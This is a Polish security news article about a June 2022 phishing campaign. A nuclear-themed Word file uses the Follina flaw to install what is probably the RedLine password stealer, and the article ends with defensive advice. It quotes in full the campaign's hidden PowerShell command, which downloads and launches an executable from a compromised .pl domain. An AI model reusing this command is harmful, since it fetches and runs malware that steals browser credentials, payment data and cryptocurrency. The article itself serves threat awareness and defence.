Hakerzy z Rosji grożą atomem: wykorzystali domenę .PL do osadzenia malware wykradającego hasła z przeglądarek

24 czerwca, 2022

Po kolei: Follina to nazwa exploita, czyli rodzaj wrednego i niebezpiecznego oprogramowania, którego jest celem uruchomienie kodu albo pozyskanie uprawnień administratora w systemie operacyjnym poprzez lukę w pakiecie biurowym Microsoft Office. Taki exploit daje przestępcy późniejszą możliwość zdalnego wykonywania niebezpiecznych poleceń z drugiego końca świata. Jest to ważne, ponieważ w tej kampanii odkrywamy malware wykradające dane z przeglądarek. Najprawdopodobniej mamy do czynienia z RedLine Stealer. Do pobrania malware dochodzi w wyniku otworzenia złośliwego dokumentu Word. Wiemy też, że niestety w atakach wykorzystano słabe zabezpieczenia web-serwera z zakotwiczoną domeną kompartpomiar.pl – zarejestrowaną jeszcze w 2006 roku.

Mamy interesujące dane techniczne o exploicie Follina z 31 maja 2022 roku, więc odsyłam do artykułu Michała.

RedLine Stealer wykrada dane z przeglądarek

Złośliwe oprogramowanie zagraża przeglądarce Google Chrome, Mozilla Firefox, Microsoft Edge oraz innym, które bazują na kodzie wyżej wymienionych. Jest to najprawdopodobniej wirus RedLine Stealer. Zresztą, czy akurat w tej kampanii użyto RedLine Stealer, czy czegoś innego, to i tak nie miałoby większego znaczenia, ponieważ przeczytaj dalej, co malware robi w systemie Windows:

  • RedLine Stealer jest dostępne za ~150 dolarów na forach przestępczych w formie jednorazowej licencji albo subskrypcji ~100 dolarów miesięcznie. Oznaczałoby to, że twórcy ulepszają złośliwy kod, bo przynosi im to zyski.
  • Złośliwe oprogramowanie kradnie informacje z przeglądarek internetowych:
    • zapisane dane logowania,
    • dane autouzupełniania,
    • informacje o kartach płatniczych.
  • Podczas uruchamiania wirusa wykonywana jest inwentaryzacja systemu, która pobiera:
    • nazwę użytkownika,
    • dane o lokalizacji,
    • konfigurację sprzętu,
    • informacje o zainstalowanym oprogramowaniu zabezpieczającym.
  • W nowszych wersjach RedLine dodano możliwość kradzieży kryptowaluty.
  • Oprogramowanie FTP jak FileZilla i komunikatory internetowe również są celem RedLine.
  • Złośliwe oprogramowanie potrafi kraść i wysyłać oraz pobierać pliki, wykonywać polecenia i okresowo wysyłać informacje o zainfekowanym komputerze.
 

Za złośliwym dokumentem ukrywają się Rosjanie

Jeden z popularnych producentów oprogramowania anty-malware ujawnił dane operacyjne przeanalizowanej kampanii. Przestępcy w nazwie pliku użyli następującej frazy:

Nuclear Terrorism A Very Real Threat.rtf

Próbowali nakłonić potencjalne ofiary do otworzenia dokumentu Word pod pozorem eskalacji wojny Rosji z Ukrainą do skali nuklearnej. W treści dokumentu zatytułowali artykuł:

Czy Putin użyje broni jądrowej na Ukrainie? Nasi eksperci odpowiadają na trzy palące pytania
exploit, follina, word, putin, ukraina
Złośliwy dokument Word wykorzystujący podatność Follina.

Złośliwy dokument jest plikiem .DOCX (udaje plik .RTF) i utworzonym 10 czerwca 2022 roku. Wykorzystuje dobrze udokumentowany mechanizm exploita Follina, by w końcowej fazie uruchomić w CMD.exe zakodowany skrypt PowerShell:

				
					"C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"
				
			

Malwarebytes twierdzi, że kod oprogramowania wskazuje na grupę hakerów APT28, ponieważ już wcześniej wykorzystywali oni podobne techniki przeciwko celom na Ukrainie. Zapoznaj się z kalendarium działań cybernetycznych przeciwko Ukrainie.

W powiązaniu do rosyjskich hakerów odsyłamy was do genialnej analizy Check Point Research. Eksperci rozpracowali na czynniki pierwsze rosyjski ekosystem cyberprzestępczy.

Rosja stanowi jedną z największych potęg we współczesnych wojnach cybernetycznych. Ich zaawansowane narzędzia, nowatorskie strategie i solidna infrastruktura sugerują istnienie gigantycznych i złożonych operacji, w których udział biorą różne rosyjskie organy wojskowe i rządowe. Natychmiast dostosowują się do zmian technologicznych i często korzystają ze świeżych bądź jeszcze nieudokumentowanych exploitów na system operacyjny Windows.

Jak sobie radzić ze złośliwym dokumentem?

Tutaj mamy do czynienia z kilkuelementowym złośliwym oprogramowaniem, dlatego im więcej warstw ochrony, tym szczelniejsze będzie zabezpieczenie, trudniejsze do pokonania – nawet po nierozważnym uruchomieniem złośliwego dokumentu.

Najlepsze zabezpieczenie to szkolenie z zakresu korzystania z komputera podczas pracy biurowej. Warto sobie zapamiętać, że w nowszych pakietach Microsoft Office 365 uruchomienie dokumentu nie jest jeszcze groźne, bo nie dochodzi do rozpoczęcia procedury infekowania systemu operacyjnego – dokument jest uruchamiany w tak zwanym chronionym obszarze o czym informuje powiadomienie w żółtej ramce:

Przykładowy złośliwy dokument zawierający polecenia makro, które są aktywowane po naciśnięciu przycisku „Włącz zawartość”.
Ostrzeżenie o potencjalnej, niebezpiecznej zawartości (plik pobrany z Internetu albo z programu pocztowego).

Dopiero kliknięcie w „zezwól na wykonanie kodu” rozpoczyna złośliwą instrukcję. Już niedługo Microsoft całkowicie zabroni (domyślnie) uruchamiać kod w plikach pobieranych z Internetu (tę opcję będzie można zmienić w ustawieniach bezpieczeństwa Office).

Administratorzy powinni korzystać z wielopoziomowego zabezpieczenia jakie umożliwia ekosystem Microsoft dla komputerów podłączonych do domeny bądź grupy roboczej, w tym narzędzie Microsoft AppLocker (zobacz hardening Windows), a także oprogramowanie antywirusowe firm trzecich. Środków zaradczych nigdy nie będzie za wiele, dlatego uzupełnieniem bezpieczeństwa dla ludzi będzie ich przeszkolenie oraz przypominanie.

W domowym biurze warto używać oprogramowania antywirusowego, najlepiej kompleksowego i z wieloma warstwami ochrony. Z tego powodu zobacz, co tymczasowo rekomendujemy. Na naszym portalu znajdziesz wiele darmowych artykułów z poradami bezpieczeństwa. Zachęcamy do codziennego odwiedzania AVLab, aby być na bieżąco. Jeżeli masz mało czasu, to też mamy dla Ciebie rozwiązanie – zostaw swój adres email i zapisz się na bezpłatne przypomnienia o nowych artykułach i poradach bezpieczeństwa.

Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

Czy ten artykuł był pomocny?

Kliknij na gwiazdkę, aby zagłosować!

Średnia ocena: 5 / 5. Liczba głosów: 4

Jak na razie nikt nie podzielił się opinią.

guest
0 komentarzy
Inline Feedbacks
View all comments

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]